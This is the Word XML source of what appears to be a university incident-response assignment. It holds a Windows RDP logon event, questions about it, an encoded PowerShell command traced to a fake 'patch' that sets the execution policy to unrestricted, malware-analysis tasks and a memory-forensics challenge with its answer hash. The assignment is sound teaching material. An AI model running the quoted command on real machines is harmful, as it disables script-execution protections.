                                <w:p w14:paraId="1D18BF3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EventData:</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="596C24BA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SubjectUserSid: S-1-5-18</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="24C9D08F" w14:textId="4C7E8EE2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SubjectUserName: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WS</w:t>
                                  </w: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$</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="6D52C16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SubjectDomainName: WORKGROUP</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="1AD1B8BA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SubjectLogonId: 0x3e7</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="7AA86F3D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TargetUserSid: S-1-5-21-1234567890-123456789-1234567890-1001</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="2AC075CA" w14:textId="4D5A843A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TargetUserName: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Admin</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="34739F5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TargetDomainName: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52B3FDEE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TargetLogonId: 0x12345</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="5E2177F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LogonType: 10</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="4503224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LogonProcessName: User32</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="2446F3C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AuthenticationPackageName: Negotiate</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="510402E5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WorkstationName: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Remote</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="21EFFBF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LogonGuid: {00000000-0000-0000-0000-000000000000}</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="0EA1CE0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TransmittedServices: -</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="7068DAB2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LmPackageName: -</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="019AD2C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KeyLength: 0</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="2B95F14B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ProcessId: 0x44c</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="32569687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ProcessName: C:\Windows\System32\svchost.exe</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="3ED9749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IpAddress: </w:t>
                                  </w:r>
                                  <w:r w:rsidRPr="00D844CD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>171.25.193.25</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="3759FE16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IpPort: 3389</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="12756983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ImpersonationLevel: %%1833</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="3D5D800F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RestrictedAdminMode: -</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="4706A580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TargetOutboundUserName: -</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="6508087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TargetOutboundDomainName: -</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="0039F628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VirtualAccount: %%1843</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="4AA51B19" w14:textId="77777777" w:rsidR="002F413F" w:rsidRPr="009C23FE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TargetLinkedLogonId: 0x0</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="3B0D5B43" w14:textId="77777777" w:rsidR="002F413F" w:rsidRDefault="002F413F" w:rsidP="002F413F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</w:pPr>
                                  <w:r w:rsidRPr="009C23FE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</w:rPr>
                                    <w:t xml:space="preserve">    ElevatedToken: %%1842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C5A7A0" id="_x0000_s1029" style="position:absolute;margin-left:14.15pt;margin-top:.5pt;width:399.6pt;height:581.4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" fillcolor="#fae2d5 [661]" strokecolor="#030e13 [484]" strokeweight="1pt">
                      <v:textbox>
                        <w:txbxContent>
                          <w:p w14:paraId="47024494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Event:</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="3D0DAA1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System:</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="5042593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Provider Name: Microsoft-Windows-Security-Auditing</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="1C667E2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EventID: 4624</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="2302AE2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Version: 2</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="38E0F8E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Level: 0</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="29B94F6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Task: 1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3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4</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="4527A63D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Opcode: 0</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="1D21561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Keywords: 0x8020000000000000</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="22F17C37" w14:textId="340FCF5B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TimeCreated SystemTime: 202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5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-0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9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2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0T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08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:2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4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:01.000Z</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="2537101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EventRecordID: 12360</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="4C7202F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Correlation: </w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="4CE8ED8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Execution ProcessID: 1234 ThreadID: 5678</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="1EEC996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Channel: Security</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="75C4C91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Computer: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19639A07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Security: </w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="1D18BF3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EventData:</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="596C24BA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SubjectUserSid: S-1-5-18</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="24C9D08F" w14:textId="4C7E8EE2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SubjectUserName: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WS</w:t>
                            </w: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$</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="6D52C16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SubjectDomainName: WORKGROUP</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="1AD1B8BA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SubjectLogonId: 0x3e7</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="7AA86F3D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TargetUserSid: S-1-5-21-1234567890-123456789-1234567890-1001</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="2AC075CA" w14:textId="4D5A843A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TargetUserName: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Admin</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="34739F5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TargetDomainName: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52B3FDEE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TargetLogonId: 0x12345</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="5E2177F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LogonType: 10</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="4503224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LogonProcessName: User32</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="2446F3C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AuthenticationPackageName: Negotiate</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="510402E5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WorkstationName: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Remote</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="21EFFBF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LogonGuid: {00000000-0000-0000-0000-000000000000}</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="0EA1CE0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TransmittedServices: -</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="7068DAB2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LmPackageName: -</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="019AD2C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KeyLength: 0</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="2B95F14B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ProcessId: 0x44c</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="32569687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ProcessName: C:\Windows\System32\svchost.exe</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="3ED9749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IpAddress: </w:t>
                            </w:r>
                            <w:r w:rsidRPr="00D844CD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171.25.193.25</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="3759FE16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IpPort: 3389</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="12756983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ImpersonationLevel: %%1833</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="3D5D800F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RestrictedAdminMode: -</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="4706A580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TargetOutboundUserName: -</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="6508087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TargetOutboundDomainName: -</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="0039F628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VirtualAccount: %%1843</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="4AA51B19" w14:textId="77777777" w:rsidR="002F413F" w:rsidRPr="009C23FE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TargetLinkedLogonId: 0x0</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="3B0D5B43" w14:textId="77777777" w:rsidR="002F413F" w:rsidRDefault="002F413F" w:rsidP="002F413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9C23FE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ElevatedToken: %%1842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A0B605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73AC1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9ECD9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343149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F7AD2A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5F0480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E081BF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824DFD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9AD100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F4CC85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FAF803B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AD75F95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37A8C42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F636B2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411E92A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6E2AED16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FD6568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CC19A42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A47B88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C7E279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EC1E04B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EC64A4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81C660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5481F08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17F565C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C4E4B0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22A0125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1EBAD0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959CC3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4FB6E5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CC3A5F0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8C1CED7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E28E21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176CAAD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54A106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5646383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74A75F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E9BD18E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AC30C1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27B42148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446D86EC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8DDD55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314D462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C88920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1E569379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A6451B6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759F9B44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  <w:p w14:paraId="07146C21" w14:textId="77777777" w:rsidR="002F413F" w:rsidRDefault="002F413F" w:rsidP="0053454A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002F413F" w14:paraId="7101AFE4" w14:textId="77777777" w:rsidTr="0053454A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9016" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="44D8EEC4" w14:textId="1815C566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lastRenderedPageBreak/>
              <w:t>It appears the adversary logged into the Web Server using a COS30015 user account. What account was used?</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0C134712" w14:textId="1642A330" w:rsidR="00012140" w:rsidRPr="00465A86" w:rsidRDefault="00012140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If the Admin installed the “patch”, what has it likely provided the attacker?</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="514CAF7E" w14:textId="157B26B5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</w:t>
            </w:r>
            <w:r w:rsidRPr="00012140">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve">hat IP address was used to access the machine (be careful to defang this IP address) </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="05F549E5" w14:textId="30889F0F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t>What is interesting about this IP address?</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2E2096DB" w14:textId="044AC9DC" w:rsidR="002F413F" w:rsidRPr="00012140" w:rsidRDefault="002F413F" w:rsidP="0053454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012140">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve">What remote access method was used? </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="33482008" w14:textId="77777777" w:rsidR="002F413F" w:rsidRPr="00012140" w:rsidRDefault="002F413F" w:rsidP="0053454A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="43D8CACC" w14:textId="3FA028B7" w:rsidR="67E59C76" w:rsidRDefault="67E59C76" w:rsidP="67E59C76">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2267600D" w14:textId="77777777" w:rsidR="00307599" w:rsidRPr="00465A86" w:rsidRDefault="00307599" w:rsidP="00307599">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00465A86">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Signs of tampering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599" w14:paraId="282C1492" w14:textId="77777777" w:rsidTr="0053454A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9016" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="72DCA33B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command has been traced to patch.exe. CMD was used to run the following command.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="156F0217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</w:p>
          <w:p w14:paraId="5EAFDA96" w14:textId="77777777" w:rsidR="00307599" w:rsidRPr="00FB55E2" w:rsidRDefault="00307599" w:rsidP="0053454A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FB55E2">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
              <w:t>powershell -EncodedCommand</w:t>
            </w:r>
            <w:r w:rsidRPr="0023387A">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
              <w:t xml:space="preserve"> U2V0LUV4ZWN1dGlvblBvbGljeSB1bnJlc3RyaWN0ZWQ=</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B61891B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</w:p>
          <w:p w14:paraId="07D597C5" w14:textId="77777777" w:rsidR="00307599" w:rsidRDefault="00307599" w:rsidP="005345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Note: line formatting makes the above command look like it is over two lines, it is one single line</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00307599" w14:paraId="65A6FC42" w14:textId="77777777" w:rsidTr="0053454A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9016" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3E1DDAC3" w14:textId="442EB45E" w:rsidR="00307599" w:rsidRPr="00465A86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Can you make sense of this command? What is last part decoded?</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1A5E4DBF" w14:textId="4566472A" w:rsidR="00307599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What op</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>inion can we now form about this executable?</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2ED9693C" w14:textId="7FC4F856" w:rsidR="00307599" w:rsidRPr="00FB55E2" w:rsidRDefault="00307599" w:rsidP="0053454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this command do?</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7BA9D3FF" w14:textId="173399C7" w:rsidR="67E59C76" w:rsidRDefault="67E59C76" w:rsidP="67E59C76">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="647AD53A" w14:textId="1ABEF4D4" w:rsidR="30A20AD3" w:rsidRPr="00465A86" w:rsidRDefault="00AB058D" w:rsidP="3BF12F61">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00465A86">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Distinction</w:t>
      </w:r>
      <w:r w:rsidR="30A20AD3" w:rsidRPr="00465A86">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">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3BF12F61" w:rsidRPr="00AE484F" w14:paraId="134D4AF8" w14:textId="77777777" w:rsidTr="3BF12F61">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9016" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0C32B193" w14:textId="59083D26" w:rsidR="002B4E70" w:rsidRDefault="001C2F4C" w:rsidP="3BF12F61">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AE484F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>An artefact has been obtained which was dropped by the adversary on the Administrator’s device</w:t>
            </w:r>
            <w:r w:rsidR="005F192D" w:rsidRPr="00AE484F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>. You should only analyse this artefact in a safe manner only</w:t>
            </w:r>
            <w:r w:rsidR="002B4E70">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:r w:rsidR="0093235B" w:rsidRPr="00AE484F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="306E970E" w14:textId="7A924905" w:rsidR="002B4E70" w:rsidRPr="002B4E70" w:rsidRDefault="0093235B" w:rsidP="002B4E7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B4E70">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>Linux VM + text editor</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="02988B55" w14:textId="77777777" w:rsidR="002B4E70" w:rsidRPr="002B4E70" w:rsidRDefault="0070454E" w:rsidP="002B4E7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2B4E70">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>Windows VM + text editor</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="63AD04CC" w14:textId="77777777" w:rsidR="002B4E70" w:rsidRDefault="002B4E70" w:rsidP="3BF12F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5F192D" w:rsidRPr="00AE484F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>o not execute it</w:t>
            </w:r>
            <w:r w:rsidR="0093235B" w:rsidRPr="00AE484F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve">. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="67ECF034" w14:textId="77777777" w:rsidR="002B4E70" w:rsidRDefault="002B4E70" w:rsidP="3BF12F61">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5243968D" w14:textId="1133E2F8" w:rsidR="30A20AD3" w:rsidRDefault="0070454E" w:rsidP="3BF12F61">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AE484F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve">You will need to </w:t>
            </w:r>
            <w:r w:rsidR="00D17BCE" w:rsidRPr="00AE484F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>decipher it</w:t>
            </w:r>
            <w:r w:rsidR="002B4E70">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> to obtain th</w:t>
            </w:r>
            <w:r w:rsidR="005A1BEE">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>e information in which to answer the question. This</w:t>
            </w:r>
            <w:r w:rsidR="00D17BCE" w:rsidRPr="00AE484F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00AE484F" w:rsidRPr="00AE484F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>may require using tools like Cyber Chef.</w:t>
            </w:r>
            <w:r w:rsidR="005A1BEE">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> No advice, help or support is provided for this question.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5087AF01" w14:textId="77777777" w:rsidR="005A1BEE" w:rsidRDefault="005A1BEE" w:rsidP="3BF12F61">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3DCB9510" w14:textId="3FB14826" w:rsidR="00AE484F" w:rsidRPr="00AE484F" w:rsidRDefault="00AB058D" w:rsidP="00AB0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Requirement: </w:t>
            </w:r>
            <w:r w:rsidR="00AE484F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve">Analyse mal2.txt and </w:t>
            </w:r>
            <w:r w:rsidR="00183D0B">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve">answer the following questions for </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>Distinction</w:t>
            </w:r>
            <w:r w:rsidR="00183D0B">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> marks.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00183D0B" w:rsidRPr="00AE484F" w14:paraId="301BBC10" w14:textId="77777777" w:rsidTr="3BF12F61">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9016" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="41B2B5F5" w14:textId="0EA0057B" w:rsidR="00183D0B" w:rsidRDefault="00EE6C7E" w:rsidP="3BF12F61">
            <w:pPr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</w:rPr>
              <w:t>What is the adversary trying to achieve:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2E31306E" w14:textId="1FDC2D59" w:rsidR="00BA1DE7" w:rsidRPr="00465A86" w:rsidRDefault="002C0057" w:rsidP="3BF12F61">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="EE0000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002B4E70">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>When does this happen:</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2A6B209F" w14:textId="3E85C02E" w:rsidR="3BF12F61" w:rsidRDefault="3BF12F61" w:rsidP="3BF12F61">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BAF0BAB" w14:textId="519CE6A6" w:rsidR="00DA3A43" w:rsidRPr="00465A86" w:rsidRDefault="000E3718">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00465A86">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>HD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3718" w14:paraId="4305BB5D" w14:textId="77777777" w:rsidTr="7C159251">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9016" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0146F85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 memory capture has been obtained from a device suspected of adversary activity. Your task is to forensically investigate the memory image using an appropriate memory forensics tool.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1AB1CCB1" w14:textId="77777777" w:rsidR="00D97903" w:rsidRPr="00846688" w:rsidRDefault="00D97903" w:rsidP="0084668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t>Your objective is to find one HD Easter Egg hidden within the memory image</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="320666CA" w14:textId="77777777" w:rsidR="00D97903" w:rsidRPr="00846688" w:rsidRDefault="00D97903" w:rsidP="0084668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t>No support, guidance, or additional hints will be provided</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3AA2131C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will clearly know when you have found the correct HD Easter Egg.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="76C3F272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5638FCB1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Analysis Process</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6343071D" w14:textId="69C2A642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Begin by investigating the provided memory image with your chosen memory forensics tool (e.g. Volatility, Rekall)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1D74C432" w14:textId="23575230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Once you locate the HD Easter Egg, you will need to conduct further analysis in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Chef:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="239771C8" w14:textId="77777777" w:rsidR="00D97903" w:rsidRPr="00D97903" w:rsidRDefault="00D97903" w:rsidP="00846688">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/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https://gchq.github.io/CyberChef/</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="03F4C14E" w14:textId="10C702F5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analysis requires deciphering five clues. Each clue helps identify the correct encoding or cipher needed to uncover the plaintext</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5FA870ED" w14:textId="3DC92CA6" w:rsidR="00D97903" w:rsidRPr="00D97903" w:rsidRDefault="00D97903" w:rsidP="00D97903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final plaintext string is your HD submission</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="311B8F5E" w14:textId="19662859" w:rsidR="00D97903" w:rsidRPr="00846688" w:rsidRDefault="00D97903" w:rsidP="00C92941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846688">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Its SHA-256 hash will be:</w:t>
            </w:r>
            <w:r w:rsidR="00846688">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00846688">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>2c8e847a1658bf74d5f5d024b52443e9b04932da50bf10be920dc870751a6580</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0957D4AE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0986CE49" w14:textId="6E497980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How the Clues Work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3A48D68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are given the first clue in plaintext</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2AD17BD1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Deciphering Clue 1 makes Clue 2 meaningful</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4187BAC5" w14:textId="77777777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Deciphering Clue 2 reveals Clue 3, and so on, until you reach Clue 5</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0F14FA1A" w14:textId="5229A978" w:rsidR="00D97903" w:rsidRPr="00D97903" w:rsidRDefault="00D97903" w:rsidP="00D97903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Each clue corresponds to one step (a "recipe") in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</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="32CB6574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3FFFDAD9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There are five recipes in total. Once all five are solved, combine them in the correct order to reveal the final plaintext.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="557B8A2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7F6FD367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Important Notes:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="000E2370" w14:textId="77777777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If a recipe requires keys or IV settings, they will be provided directly in the relevant clue</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="39722D78" w14:textId="25D0B12C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You do not need to change any other Cyber</w:t>
            </w:r>
            <w:r w:rsidR="00A20230">
              <w:rPr>
